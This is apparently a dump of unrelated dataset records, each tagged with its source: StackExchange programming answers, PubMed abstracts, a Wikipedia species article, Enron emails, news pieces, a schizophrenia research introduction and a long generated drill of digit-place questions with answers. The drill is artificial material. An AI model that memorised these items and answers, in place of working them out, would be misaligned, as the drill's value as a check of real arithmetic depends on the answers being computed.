2 2013-01-08 2.5 1200.000
3 2013-01-12 1.5 1200.000
4 2013-01-17 3.5 1400.000
|
{
"pile_set_name": "StackExchange"
}
|
Pediatric neurosurgery.
Randomized controlled trials of neurosurgical procedures involving children have been organized infrequently; as a consequence, the majority of pediatric neurosurgical practice is not supported by class I data. Furthermore, many trials that have been reported suffer from serious methodological shortcomings such as insufficient power and poor statistical analysis. Finally, several trials of neurosurgical techniques that are frequently performed on children have either excluded children from participation or include an insufficient number of children to draw strong conclusions. Despite these shortcomings, pediatric neurosurgery, like all fields in medicine, is gradually moving towards a more stringent evidence-based medicine standard. This chapter will attempt to summarize the recent progress that has been made in this area.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Notothenia coriiceps
Notothenia coriiceps, also known as the black rockcod, Antarctic yellowbelly rockcod, or Antarctic bullhead notothen, is a species of notothen that is widely spread around the Antarctic continent. Like other Antarctic notothenioid fishes, N. coriiceps evolved in the stable, ice-cold environment of the Southern Ocean. It is not currently targeted by commercial fisheries.
Distribution and diet
N. coriiceps maintains a circum-Antarctic distribution that is likely governed at least in part by the presence of the Antarctic Circumpolar Current (ACC) as well as its egg dispersal patterns. Populations of this species have been recorded at sites in the western Ross Sea, the Weddell Sea, the Western Antarctic Peninsula, the islands of the Scotia Arc to South Georgia, the Balleny Islands, and the sub-Antarctic islands of the Indian Ocean sector. N. coriiceps feeds on macroalgae, amphipods, and euphausiids. It appears to feed year-round, although diet composition likely varies seasonally.
Morphology
N. coriiceps members have scales that typically appear brown or gray in color. Its teeth consist of a multi-row tooth plate and caniform teeth, which are located in the outer portion of the jaw. Adult males typically reach a length of approximately 50 cm (20 in).
Like many other notothenioid fishes, it lacks a swim bladder. Bone density increases during maturation, resulting in reduced buoyancy and the transition from pelagic to demersal swimming behavior. Adult N. coriiceps possess a dense, well-developed skeleton compared to their congener Notothenia rossii, accounting for their reduced buoyancy.
Its epithelium is characterized by the presence of fat droplets, which serve as a storage mechanism for dietary lipids. Fat droplets are also stored in bone tissue.
Physiology
Like most other Antarctic notothenioids, N. coriiceps exhibits several adaptations that optimize organismal performance at subzero temperatures. These include a modified heat shock response, the production of antifreeze glycoproteins that prevent ice crystallization of body fluids at subzero temperatures, and the abundance of polyunsaturated fatty acids that allow cells to maintain membrane fluidity. N. coriiceps has a limited tolerance for acute temperature change but has demonstrated the capacity to extend its thermal limits upon long-term acclimation to warmer temperatures.
Genome
The N. coriiceps genome was sequenced in 2014. Results indicated rapid evolution of genes during speciation, especially in proteins that code for mitochondrial proteins and hemoglobin. In addition, the authors found that many N. coriiceps genes are reflective of adaptation to cold temperatures, with specialized genes related to the species' modified heat shock response as well as enhanced oxidative phosphorylation at cold temperatures.
References
Category:Nototheniidae
Category:Fish of the Southern Ocean
Category:Taxa named by John Richardson (naturalist)
Category:Fish described in 1844
|
{
"pile_set_name": "Wikipedia (en)"
}
|
19 Facts You (Probably) Didn't Know About 'LUV' Rapper Tory Lanez
What happened between him and Drake?
When he was 17 years old, Tory sent his 'Play For Keeps' mixtape to Drake, offering Drizzy $10k if he wasn't impressed. However, Drake never got back to him, sparking the pair's six-year rivalry. Drake took a dig at Tory in 'Summer Sixteen', whilst Tory hit back, claiming that calling Toronto 'The Six' wasn't cool. Picture: PA
|
{
"pile_set_name": "Pile-CC"
}
|
I have to move some final things out of my old house. I hope I close
tomorrow! If you would like to meet me at my new house, and then we could
run over quick and grab the final things I could go after...
"Patti Young" <pyoung@pdq.net>
06/21/2000 07:08 PM
To: <tana.jones@enron.com>
cc:
Subject: Wednesday
If you don't have dinner plans, would you like to eat out somewhere this
evening??
I will be here a few more minutes.
|
{
"pile_set_name": "Enron Emails"
}
|
Sydney councils are continuing to shut beaches and urging those wanting to exercise to stay away from busy coastal walking tracks during the Easter long weekend.
Amid warnings for residents to stay home in a bid to slow the spread of coronavirus, councils and police have intensified patrols at beaches, parks, and common exercise routes from Dee Why to Cronulla.
Beaches at Cronulla in Sydney's south are closed until midnight on Monday, in a bid to deter crowds during the weekend. Credit: Rhett Wyman
Sydney's busiest beaches were thrust into the spotlight after thousands of people flocked to Bondi as the state government tried to enforce social distancing measures.
This weekend's closures affect the majority of beaches from Dee Why and Manly in the north, to Bondi and Coogee in the east, and south to Sans Souci and South Cronulla. Many are set to reopen at midnight on Monday.
|
{
"pile_set_name": "OpenWebText2"
}
|
[Oxaliplatin and genito-urinary tumors].
Considering genito-urinary tumors, the use of oxaliplatin should be restricted to clinical trials since no marketing approval has been obtained. Results of prospective studies currently suggest that the development of oxaliplatin should be carried on with first-line management of poor prognosis metastatic germ cell tumors as well as metastatic bladder cancer patients not eligible for cisplatin therapy.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Q:
Strophe MAM how to display the messages?
I have managed to use Strophe MAM to get the archived messages into the rawInput handler, and to display the last message (but only the last one). How do I display all the messages from rawInput, not just the last one?
And how do I extract who each message is from?
I have limited the messages to the last 5.
connection.mam.query("test3@macbook-pro.local", {
"with": "test4@macbook-pro.local","before": '',"max":"5",
onMessage: function(message) {
console.log( $(message).text());
},
onComplete: function(response) {
console.log("Got all the messages");
}
});
A:
You can get all the messages using the `strophe.mam.js` plugin.
Here is my working code:
// Retrives the messages between two particular users.
var archive = [];
var q = {
onMessage: function(message) {
try {
var id = message.querySelector('result').getAttribute('id');
var fwd = message.querySelector('forwarded');
var d = fwd.querySelector('delay').getAttribute('stamp');
var msg = fwd.querySelector('message');
var msg_data = {
id:id,
with: Strophe.getBareJidFromJid(msg.getAttribute('to')),
timestamp: (new Date(d)),
timestamp_orig: d,
from: Strophe.getBareJidFromJid(msg.getAttribute('from')),
to: Strophe.getBareJidFromJid(msg.getAttribute('to')),
type: msg.getAttribute('type'),
body: msg.getElementsByTagName('body')[0], // <body> is a child element, not an attribute
message: Strophe.getText(msg.getElementsByTagName('body')[0])
};
archive.val(archive.val() + msg_data.from + ":" + msg_data.message + "\n" + msg_data.to + ":" + msg_data.message + "\n");
archive.scrollTop(archive[0].scrollHeight - archive.height());
console.log('xmpp.history.message',msg_data.message);
} catch(err){
if(err instanceof TypeError){ // typeof(err) would return 'object', never 'TypeError'
try {
console.log(err.stack)
} catch(err2){
console.log(err,err2);
}
}
}
return true;
},
onComplete: function(response) {
console.log('xmpp.history.end',{query:q, response:response});
}
};
$(document).ready(function(){
archive = $("#archive-messages");
archive.val("");
$("#to-jid").change(function() {
$("#archive-messages").val("");
var to = {"with": $(this).val()};
$.extend(q, to); // only merge the "with" filter; "before"/"max" were undefined here
// It takes around 800ms to auto login. So after this timeout we have to retrieve the messages of particular User.
setTimeout(function(){
connection.mam.query(Strophe.getBareJidFromJid(connection.jid), q);
}, 1000);
});
});
|
{
"pile_set_name": "StackExchange"
}
|
10 competitions humans fought against machines
In 1981, science essayist Jeremy Bernstein wrote a piece for The New Yorker that touched upon a historic backgammon game two years earlier, in which reigning champ Luigi Villa lost to a computer. It was the first time an artificial-intelligence program had defeated a world champion at a board or card game. In the essay, Bernstein wrote: “What does this mean for us, for our sense of uniqueness and worth — especially as machines evolve whose output we can less and less distinguish from our own?” He might have asked that decades ago, but the question is now more relevant than ever. Google’s AlphaGo recently won four out of five matches against Go master Lee Se-dol. And that’s just the latest example: In the intervening years since Villa’s loss, humans…
|
{
"pile_set_name": "Pile-CC"
}
|
Q:
Parameter in the page URL
Hi all, I need to create a Pyramid application that consumes an API.
1 - “/quotes/< quote_number>” - Display a page containing the quote returned by the API for the given < quote_number >.
I already know how to create a static page in Pyramid, but I don't know how to create a page that receives a parameter in the URL.
A:
Based on the content of this page, you just need to define the parameter in the URL between braces, such as {parametro}, and access it through request.matchdict. Here is an example:
from pyramid.view import view_config
from pyramid.response import Response

@view_config(route_name='quotes_number')
def quotes_number(request):
    return Response(request.matchdict['quote_number'])

config.add_route('quotes_number', 'quotes/{quote_number}')
|
{
"pile_set_name": "StackExchange"
}
|
Pilsbry was among the most productive taxonomists
ever to pick up a magnifying glass; in all he published some three thousand
articles (around twelve hundred in his journal Nautilus alone)
and described and named going on six thousand forms. Pilsbry's immersion
in the world of shelled creatures was so intense and over such a long
period (he published writings in a total of eight decades) that he became
a veritable institution. He worked on both freshwater and marine organisms,
extant and extinct species, and American and foreign forms. Further, his
studies extended beyond mere descriptive work; he was interested in ecology
and biogeography as well, and made contributions relevant to oil exploration
activities and epidemiology. In addition to his attention to molluscs,
Pilsbry was also the leading expert on barnacles. Pilsbry spent many an
hour in his lab at the Academy of Natural Sciences, but he actually also
spent a fair amount of time in the field, collecting specimens in the
U.S., Hawaii, Central and South America, the West Indies, the Galapagos
Islands, Japan, Australia, and various South Pacific islands.
|
{
"pile_set_name": "Pile-CC"
}
|
THE LOCATION HAS CHANGED 50th Floor Boardroom - Enron Building with Video
link to London The meeting begins at 8:30 (Breakfast will be provided).
PLEASE SEND A LIST OF ANY ATTENDEES FROM YOUR GROUP OTHER THAN YOURSELF. WE
NEED THIS INFORMATION BY 2:00 PM TODAY.
MESSAGE FROM RICK
You must come to the meeting with the following distribution of your people:
Superior: 5%
Excellent: 30%
Strong: 30%
Satisfactory: 20%
Needs Improvement and Issues: 15%
|
{
"pile_set_name": "Enron Emails"
}
|
Sooner or later, every programmer ends up searching for code snippets and algorithms. Most search engines, though, don’t exactly specialize in code search and so you end up with a couple of links (one of them most likely to StackOverflow). Now, Microsoft has partnered with HackerRank to bring code snippets right into its Bing search results pages — and as an added twist, you can also edit and execute this code right on those pages, too.
To trigger this, all you have to do is search for something like “string concat C#” or a similar question and Bing will pop up the editor for you. Using the widget, you can also switch to other languages as well. Depending on the algorithm you’re looking for, the options here include C, C++, C#, Python, PHP, and Java.
HackerRank co-founder Vivek Ravisankar tells me the project currently features over 80 code snippets that focus on the most commonly searched terms.
Microsoft is positioning this as both a productivity and learning tool.
“In addition to learning how a certain algorithm/code is written in a given language, users will also be able to check how the same solution is constructed in a range of other programming languages too — providing a Rosetta-stone model for programming languages,” says Marcelo De Barros, Group Engineering Manager for the UX Features and Shared Tools at Bing.
If you’re a Visual Studio user, it’s also worth checking out Microsoft’s Developer Assistant plugin (previously known as the Bing Code Search add-on), which allows you to find and reuse over 21 million code snippets and samples right from within the IDE.
|
{
"pile_set_name": "OpenWebText2"
}
|
What is the thousands digit of 18466?
8
What is the units digit of 1104?
4
What is the units digit of 102?
2
What is the hundreds digit of 792?
7
What is the thousands digit of 5096?
5
What is the thousands digit of 62220?
2
What is the units digit of 81092?
2
What is the units digit of 132696?
6
What is the units digit of 1967?
7
What is the thousands digit of 12910?
2
What is the hundreds digit of 433?
4
What is the tens digit of 1548?
4
What is the ten thousands digit of 21206?
2
What is the tens digit of 125?
2
What is the tens digit of 14063?
6
What is the thousands digit of 45025?
5
What is the units digit of 1449?
9
What is the tens digit of 4579?
7
What is the hundreds digit of 2933?
9
What is the thousands digit of 45693?
5
What is the hundreds digit of 1774?
7
What is the hundreds digit of 9675?
6
What is the units digit of 1936?
6
What is the ten thousands digit of 13575?
1
What is the thousands digit of 1469?
1
What is the tens digit of 77186?
8
What is the hundreds digit of 58516?
5
What is the tens digit of 36304?
0
What is the thousands digit of 1733?
1
What is the ten thousands digit of 29993?
2
What is the tens digit of 9385?
8
What is the hundreds digit of 8774?
7
What is the tens digit of 7496?
9
What is the units digit of 1586?
6
What is the hundreds digit of 167?
1
What is the units digit of 289?
9
What is the units digit of 18833?
3
What is the hundreds digit of 927?
9
What is the units digit of 559?
9
What is the units digit of 1987?
7
What is the hundreds digit of 59067?
0
What is the tens digit of 22603?
0
What is the thousands digit of 1086?
1
What is the hundreds digit of 11860?
8
What is the ten thousands digit of 23076?
2
What is the tens digit of 7891?
9
What is the ten thousands digit of 11525?
1
What is the ten thousands digit of 15402?
1
What is the thousands digit of 1623?
1
What is the hundreds digit of 10652?
6
What is the tens digit of 17888?
8
What is the thousands digit of 39613?
9
What is the ten thousands digit of 40001?
4
What is the thousands digit of 5653?
5
What is the ten thousands digit of 30308?
3
What is the units digit of 1675?
5
What is the tens digit of 1378?
7
What is the units digit of 5290?
0
What is the ten thousands digit of 109588?
0
What is the units digit of 10206?
6
What is the units digit of 1281?
1
What is the ten thousands digit of 13825?
1
What is the ten thousands digit of 41241?
4
What is the units digit of 125?
5
What is the ten thousands digit of 19421?
1
What is the tens digit of 19943?
4
What is the hundreds digit of 1204?
2
What is the hundreds digit of 3586?
5
What is the units digit of 26328?
8
What is the tens digit of 27213?
1
What is the units digit of 2566?
6
What is the tens digit of 62?
6
What is the hundreds digit of 774?
7
What is the hundreds digit of 860?
8
What is the tens digit of 73?
7
What is the hundreds digit of 144049?
0
What is the tens digit of 109771?
7
What is the tens digit of 7338?
3
What is the tens digit of 22254?
5
What is the units digit of 170520?
0
What is the tens digit of 395?
9
What is the thousands digit of 2179?
2
What is the ten thousands digit of 29549?
2
What is the hundreds digit of 202?
2
What is the units digit of 995?
5
What is the ten thousands digit of 45774?
4
What is the thousands digit of 1296?
1
What is the hundreds digit of 19528?
5
What is the thousands digit of 8525?
8
What is the tens digit of 126103?
0
What is the tens digit of 439?
3
What is the units digit of 3499?
9
What is the ten thousands digit of 93691?
9
What is the hundreds digit of 113704?
7
What is the ten thousands digit of 85069?
8
What is the tens digit of 2912?
1
What is the ten thousands digit of 22936?
2
What is the units digit of 2410?
0
What is the tens digit of 4225?
2
What is the thousands digit of 98766?
8
What is the units digit of 1485?
5
What is the ten thousands digit of 57979?
5
What is the units digit of 20804?
4
What is the units digit of 34943?
3
What is the tens digit of 2913?
1
What is the units digit of 43638?
8
What is the tens digit of 706?
0
What is the hundreds digit of 655?
6
What is the thousands digit of 18520?
8
What is the tens digit of 36792?
9
What is the thousands digit of 3876?
3
What is the thousands digit of 1077?
1
What is the units digit of 9213?
3
What is the hundreds digit of 422?
4
What is the tens digit of 758?
5
What is the units digit of 72462?
2
What is the thousands digit of 12468?
2
What is the units digit of 6534?
4
What is the hundreds digit of 8133?
1
What is the hundred thousands digit of 139178?
1
What is the hundreds digit of 14435?
4
What is the units digit of 218?
8
What is the units digit of 9441?
1
What is the units digit of 10405?
5
What is the units digit of 8480?
0
What is the thousands digit of 20568?
0
What is the ten thousands digit of 118762?
1
What is the ten thousands digit of 20521?
2
What is the thousands digit of 2389?
2
What is the units digit of 5840?
0
What is the hundreds digit of 3768?
7
What is the hundreds digit of 2959?
9
What is the hundreds digit of 2017?
0
What is the units digit of 25575?
5
What is the tens digit of 677?
7
What is the thousands digit of 47048?
7
What is the thousands digit of 2611?
2
What is the thousands digit of 9417?
9
What is the hundreds digit of 8250?
2
What is the thousands digit of 23467?
3
What is the tens digit of 439?
3
What is the hundreds digit of 1883?
8
What is the tens digit of 2249?
4
What is the hundreds digit of 122476?
4
What is the tens digit of 35967?
6
What is the hundreds digit of 1703?
7
What is the hundreds digit of 5401?
4
What is the thousands digit of 1910?
1
What is the units digit of 3837?
7
What is the units digit of 8150?
0
What is the thousands digit of 1305?
1
What is the thousands digit of 29831?
9
What is the tens digit of 3104?
0
What is the units digit of 1921?
1
What is the ten thousands digit of 19961?
1
What is the units digit of 89138?
8
What is the units digit of 25697?
7
What is the tens digit of 1215?
1
What is the units digit of 3769?
9
What is the thousands digit of 13762?
3
What is the units digit of 5967?
7
What is the units digit of 2351?
1
What is the hundreds digit of 2876?
8
What is the ten thousands digit of 23524?
2
What is the units digit of 14508?
8
What is the thousands digit of 1002?
1
What is the units digit of 7330?
0
What is the tens digit of 1047?
4
What is the hundreds digit of 846?
8
What is the tens digit of 932?
3
What is the ten thousands digit of 26705?
2
What is the hundreds digit of 19454?
4
What is the tens digit of 86893?
9
What is the tens digit of 2050?
5
What is the tens digit of 697?
9
What is the hundreds digit of 495?
4
What is the ten thousands digit of 15421?
1
What is the tens digit of 2374?
7
What is the units digit of 1265?
5
What is the tens digit of 27?
2
What is the units digit of 91790?
0
What is the units digit of 10504?
4
What is the hundreds digit of 1645?
6
What is the thousands digit of 5728?
5
What is the hundreds digit of 1829?
8
What is the tens digit of 5695?
9
What is the tens digit of 5505?
0
What is the hundreds digit of 14791?
7
What is the ten thousands digit of 83106?
8
What is the thousands digit of 18349?
8
What is the hundreds digit of 48696?
6
What is the tens digit of 1152?
5
What is the units digit of 18919?
9
What is the ten thousands digit of 18162?
1
What is the units digit of 10503?
3
What is the tens digit of 152014?
1
What is the units digit of 9167?
7
What is the hundreds digit of 468?
4
What is the tens digit of 12932?
3
What is the hundreds digit of 7256?
2
What is the units digit of 318?
8
What is the hundreds digit of 16481?
4
What is the units digit of 1283?
3
What is the ten thousands digit of 19304?
1
What is the tens digit of 197?
9
What is the hundreds digit of 464?
4
What is the ten thousands digit of 71246?
7
What is the hundreds digit of 448?
4
What is the units digit of 3991?
1
What is the thousands digit of 56726?
6
What is the units digit of 4260?
0
What is the units digit of 61713?
3
What is the units digit of 106379?
9
What is the hundreds digit of 695?
6
What is the thousands digit of 70012?
0
What is the tens digit of 4734?
3
What is the tens digit of 2292?
9
What is the units digit of 184?
4
What is the thousands digit of 19
|
{
"pile_set_name": "DM Mathematics"
}
|
Daily dietary copper intake in Belgium, using duplicate portion sampling.
Daily dietary copper intake in Belgium has been evaluated by duplicate portion sampling, heating in a microwave oven and atomic absorption spectrometric determination of this element. The mean intake value (1.5 +/- 0.4 mg/day) is similar to levels found for most other countries, but is situated at the lower end of the recommended range for a safe and adequate daily dietary intake.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Low-Cost Methodology for Skin Strain Measurement of a Flexed Biological Limb.
The purpose of this manuscript is to compute skin strain data from a flexed biological limb, using portable, inexpensive, and easily available resources. We apply and evaluate this approach on a person with bilateral transtibial amputations, imaging left and right residual limbs in extended and flexed knee postures. We map 3-D deformations to a flexed biological limb using freeware and a simple point-and-shoot camera. Mean principal strain, maximum shear strain, as well as lines of maximum, minimum, and nonextension are computed from 3-D digital models to inform directional mappings of the strain field for an unloaded residual limb. Peak tensile strains are ∼0.3 on the anterior surface of the knee in the proximal region of the patella, whereas peak compressive strains are ∼ -0.5 on the posterior surface of the knee. Peak maximum shear strains are ∼0.3 on the posterior surface of the knee. The accuracy and precision of this methodology are assessed for a ground-truth model. The mean point location distance is found to be 0.08 cm, and the overall standard deviation for point location difference vectors is 0.05 cm. This low-cost and mobile methodology may prove critical for applications such as the prosthetic socket interface where whole-limb skin strain data are required from patients in the field outside of traditional, large-scale clinical centers. Such data may inform the design of wearable technologies that directly interface with human skin.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
When “Captain America: Steve Rogers” #1 was released, the reaction was intense. Just after Marvel secured the superhero movie win against its rivals with Captain America: Civil War, news broke that a new series by Nick Spencer would revise the iconic hero as a secret HYDRA agent from the very start.
There are two ways to look at this situation, each of which undermines this revision as being “true”: 1. This is just an elaborate marketing tool; 2. This is merely one of many versions of the character, and it does not override the others.
Although these are not mutually exclusive, we will treat them as separate matters.
A Marketing Plot
According to reports, the comic book publishing industry is in dire straits. Every year, press releases by distributors claim that sales are down, and doomsayers are constantly predicting the fall of a major publisher.
The industry is not in a risky place, nor will it collapse. Success should not be measured in sales figures but in stories, and readers will always turn to iconic storylines. However, the business side of the profession will always make high demands and seek to bring in an ever increasing profit. Thus, we get false iconic stories that seek to make money off of controversy rather than an honest movement in the field.
The Death of Superman story arc was extremely controversial, and it brought in a lot of interest to Superman during the 90s because it was controversial. Although it was interesting in concept, with its use of brutality and actual loss, it became just another marketing gimmick. Superman was restored in a very strained manner, and the plot line has been glossed over ever since.
It does not matter if popular demand or corporate executives were the catalyst for Superman’s return. In the end, he returned because there was a lot of profit to be made. There are many similar examples of fake storyline changes for the sake of profit, but this is the quintessential example.
It is very possible that Spencer and those at Marvel wanted to use controversy to gain sales. It is not surprising that so many websites, media groups, and high profile fans have weighed into the controversy. Free publicity is great for marketing.
Spencer also has a history of bait and switch plot lines. It is quite possible that the “Rogers is a HYDRA agent” will be reversed. A fan who dislikes what is happening can either see it as a cynical marketing ploy based on controversy, or a cynical marketing ploy based on fake controversy that will soon be reversed.
But what if this story line sticks and Rogers as HYDRA agent is deemed canonical?
There is No “Canon”
We can call it the George Lucas effect: the author’s attempt to dramatically revise a plot or story because their personal views on the matter have changed. However, once an author has published a work, they no longer have control over it; it has become part of the reader. No matter how many revised editions or later stories are published, the reader can choose to accept or dismiss at will. Some call this “head canon,” but, more appropriately, there is no “canon.”
Authors have control over what is produced, but they can never control how a work is interpreted. Famously, William Wordsworth tried to revise many of his poems later in life to ground them more firmly in Christianity, yet most critics and readers seemed to ignore the changes. They preferred the earlier works, and the later revisions are practically unknown. The audience is firmly in control, but they seem unable to realize it.
The major problem with fan reaction in general is that everyone has their own version of a comic book hero, either based on a particular run or incarnation of the character or an amalgamation of aspects that form an idealized version. There is a whole field based on studying this reaction called Phenomenology. In general, we react poorly when the realized form of a character does not match our preconceived form. Likewise, we experience a sense of gratitude and security when the character does match.
Art has two purposes: to soothe the soul and to challenge the mind. In many instances, the two functions are in conflict with each other, which is what we are experiencing now.
When a reader begins to see the “Captain America: Steve Rogers” as Spencer’s interpretation and not the interpretation, then this conflict is eased. They can approach the work in a more objective sense and try to see the ramifications of this change. DC has a history of doing this very thing with Superman, especially in “Red Son” and “Kingdom Come.” Marvel, to a lesser extent, has their “What Ifs” and parallel universes, and Marvel NOW! has revised many storylines.
Readers should not expect continuity within a greater whole. Instead, they should focus on smaller segments, and return to those cherished storylines every now and then. Oddly, the Marvel Cinematic Universe diverged in many ways from the comics, especially with “Civil War” (as we explain here), yet there has been little outrage. The ethnicity and gender changes of a few characters have been questioned, but most fans do not care.
“Batman v Superman” did not fare so well. We’ve had many, many television and movie versions of Superman and Batman, yet fans and critics were unwilling to accept a darker version of the characters that has been very prominent in the comics since the 80’s (we touch on it here).
Either we are fine with different iconic characters being used in new and interesting ways, or we are not. It is a strange inconsistency, and it seems that Marvel is finally falling prey to it. However, it could be that Marvel is courting this inconsistency, as explained in the first point.
In the end, this is just another storyline by an author who has never been a great writer and who relies on controversy over substance. Eventually, another writer will take up the mantle of writing Steve Rogers, and the character may go in yet another direction. That is how the industry works.
There is no reason to panic. In the end, Captain America — or Steve Rogers' Captain America — is not a HYDRA agent, unless you really want him to be one.
|
{
"pile_set_name": "OpenWebText2"
}
|
Q:
What's the math for real world back-propagation?
Considering a simple ANN:
$$x \rightarrow
f=(U_{m\times n}x^T)^T \rightarrow
g = g(f) \rightarrow
h = (V_{p \times m}g^T)^T \rightarrow
L = L(h,y)
$$
where $x\in\mathbb{R}^n$, $U$ and $V$ are matrices, $g$ is the point-wise sigmoid function, $L$ returns a real number indicating the loss by comparing the output $h$ with target $y$, and finally $\rightarrow$ represents data flow.
To minimize $L$ over $U$ and $V$ using gradient descent, we need to know $\frac{\partial L}{\partial U_{ij}}$ and $\frac{\partial L}{\partial V_{ij}}$, I know two ways to do this:
- do the differentiation pointwise, and have a hard time figuring out how to vectorize it
- flatten $U$ and $V$ into a row vector, and use multivariate calculus (takes a vector, yields a vector) to do the differentiation
For the purpose of a tutorial or illustration, the above two methods might suffice, but if you really want to implement back-prop by hand in the real world, what math would you use to do the derivative?
I mean, is there a branch or method in math that teaches you how to take the derivative of a vector-valued function of matrices?
A:
There is Matrix Calculus, (and I would recommend the very useful Matrix Cookbook as a bookmark to keep), but for the most part, when it comes to derivatives, it just boils down to pointwise differentiation and keeping your dimensionalities in check.
You might also want to look up Autodifferentiation. This is sort of a generalisation of the Chain Rule, such that it's possible to decompose any composite function, i.e. $a(x) = f(g(x))$, and calculate the gradient of the loss with respect to $g$ as a function of the gradient of the loss with respect to $f$.
This means that for every operation in your neural network, you can give it the gradient of the operation that "consumes" it, and it'll calculate its own gradient and propagate the error backwards (hence back-propagation).
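For the concrete network in the question, the pointwise approach works out to a couple of outer products. Here is a minimal NumPy sketch (my own illustration, not from the question or answer, assuming a squared-error loss for $L$), with a finite-difference check of the analytic gradients:

```python
import numpy as np

# Pointwise chain-rule gradients for x -> U x -> sigmoid -> V g,
# with a squared-error loss L = 0.5 * ||h - y||^2 assumed.

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

def loss(U, V, x, y):
    h = V @ sigmoid(U @ x)
    return 0.5 * np.sum((h - y) ** 2)

def grads(U, V, x, y):
    f = U @ x
    g = sigmoid(f)
    h = V @ g
    dh = h - y                 # dL/dh for the squared-error loss
    dV = np.outer(dh, g)       # dL/dV = dh g^T
    dg = V.T @ dh              # back through the linear layer V
    df = dg * g * (1.0 - g)    # back through the pointwise sigmoid
    dU = np.outer(df, x)       # dL/dU = df x^T
    return dU, dV

rng = np.random.default_rng(0)
n, m, p = 4, 3, 2
x, y = rng.normal(size=n), rng.normal(size=p)
U, V = rng.normal(size=(m, n)), rng.normal(size=(p, m))
dU, dV = grads(U, V, x, y)

# Central-difference check on one entry of U
eps = 1e-6
Up, Um = U.copy(), U.copy()
Up[0, 0] += eps
Um[0, 0] -= eps
numeric = (loss(Up, V, x, y) - loss(Um, V, x, y)) / (2 * eps)
assert abs(numeric - dU[0, 0]) < 1e-6
```

The same pattern generalizes to minibatches by replacing the outer products with matrix products, which is exactly the "keeping your dimensionalities in check" mentioned above.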
|
{
"pile_set_name": "StackExchange"
}
|
Major Arcana (album)
Major Arcana is the debut full-length studio album from the indie rock group Speedy Ortiz. It was released on July 9, 2013 by Carpark Records.
Reception
Major Arcana has received very positive reviews. The album has a score of 81 out of 100 on the review aggregate site Metacritic, based on 16 reviews.
Pitchfork Media's Lindsay Zoladz gave the album a Best New Album designation, claiming that frontwoman Sadie Dupuis "writ[es] lyrics that are actually worth poring over". David Brusie of The A.V. Club also praised the album, calling it "a markedly assured debut, one that makes Speedy Ortiz an act to watch". Consequence of Sound's Katherine Flynn called the album "strong, punchy musical concentrate". Robin Smith of PopMatters wrote that "its angular, moody ‘90s feel conjures the image of an overgrown punk hanging around a playground at night, drinking, smoking, wasting".
Pitchfork Media ranked Major Arcana #48 on its list of the top 50 albums of 2013, writing: "Speedy Ortiz strains the strangled chords and corkscrew interplay of 90s guitar heroes [...] into jaggedly axed anthem". The album was listed 31st on Stereogum's list of top 50 albums of 2013.
The song "No Below" was featured in the 2017 Square Enix/Deck Nine game Life is Strange: Before the Storm.
Track listing
All songs by Speedy Ortiz.
Charts
References
Category:2013 albums
Category:Speedy Ortiz albums
Category:Carpark Records albums
|
{
"pile_set_name": "Wikipedia (en)"
}
|
Background
==========
The Endogenous Cannabinoid (EC) system comprises at least two cannabinoid receptors, the CB~1~and CB~2~receptors, a series of lipophilic endogenous ligands, the endocannabinoids (ECs), and enzymes for EC biosynthesis and degradation \[[@B1]\]. Mounting evidence indicates that it is involved in the physiological modulation of many crucial functions in both the peripheral and the central nervous system \[[@B1]\]. It has been hypothesized that an alteration of EC neurotransmission could play a role in neurological, psychiatric and immunological disorders \[[@B2],[@B3]\]. In this context, it is possible that, along with other neurotransmitter systems (i.e., dopaminergic, serotonergic), anomalies of the ECs might take part in producing the clinical picture of schizophrenia. This hypothesis relies on the following considerations:
1\) Subjects with acute cannabis intoxication often display a schizophrenia-like syndrome, with hallucinations, altered judgement, false beliefs, and cognitive impairment \[[@B4]\]. In other, predisposed individuals, cannabis can precipitate a psychotic illness \[[@B5]\], although this does not necessarily indicate a causative role of ECs in mental disorders. Finally, lack of motivation, apathy and avolition are almost invariably observed in long-term cannabis users, so as to mimic the picture of chronic or residual schizophrenia.
2\) Under physiological conditions, the EC system participates in the regulation of important functions, such as rest, cognition, movement, memory, and perception \[[@B6]\]. Many of these functions are actually altered in the course of schizophrenia.
3\) There appears to be a substantial overlap between the areas commonly believed to be involved in the pathogenesis of schizophrenia \[[@B7]\] and those expressing the highest concentrations of EC receptors in the CNS \[[@B2]\], i.e. the limbic system (hippocampus/amygdala), nigro-striatal areas, and the prefrontal cortex, among the others.
There has been evidence in the recent literature \[[@B7]-[@B9]\] that patients suffering from schizophrenia have detectable differences in their EC signalling when compared to normal controls. Leweke et al. \[[@B8]\] reported elevated levels of the endogenous cannabinoid receptor ligand anandamide \[[@B10]\] in the Cerebro-Spinal Fluid (CSF) of patients with schizophrenia. Voruganti et al. \[[@B9]\] have shown a correlation between the severity of psychotic symptoms and an increase in cannabis-induced striatal dopaminergic neurotransmission in a patient with the disorder. Finally, polymorphism of the gene encoding the CB~1~receptor, which is the cannabinoid receptor subtype mostly expressed in the brain, has been associated with increased susceptibility to hebephrenic schizophrenia \[[@B11]\], thus suggesting that a malfunctioning EC system could play a role in the etiopathogenesis of this disorder.
There have been several reports that schizophrenia is accompanied by overt alterations in the immune response, as well as by changes in the function of immune blood cells, and that many of these alterations can be normalized by anti-psychotic drugs \[\[[@B12]-[@B14]\] and \[[@B15]\] for review\]. In particular, a significantly increased number of activated macrophages and lymphocytes has been detected in the CSF of schizophrenic patients during acute psychotic episodes \[[@B16],[@B17]\]. Since activated macrophages and lymphocytes release significant amounts of ECs \[[@B18]-[@B20]\], it is possible that these blood cells contribute to some extent to the previously observed elevated levels of anandamide in the CSF of patients with a diagnosis of schizophrenia \[[@B8]\]. It is worthwhile noting that some of the immune functions previously found to be altered during acute schizophrenia, such as interleukin and tumor necrosis factor-α release, are also known to be influenced by ECs acting at both CB~1~and, particularly, CB~2~cannabinoid receptors in macrophages, lymphocytes and dendritic cells \[[@B3]\]. Notwithstanding the above observations, and despite the fact that ECs can easily cross the blood brain barrier \[[@B10]\], the levels of these compounds in the blood of schizophrenic patients have never been assessed.
Aims of the study
-----------------
We analysed the peripheral blood of patients and normal controls, in order to detect any differences in the levels of: (i) the endogenous ligands of cannabinoid receptors (the endocannabinoids, \[[@B10]\]); (ii) the cannabinoid CB~1~and CB~2~receptors, and (iii) the fatty acid amide hydrolase (FAAH), one of the enzymes mostly involved in endocannabinoid inactivation \[[@B21]\].
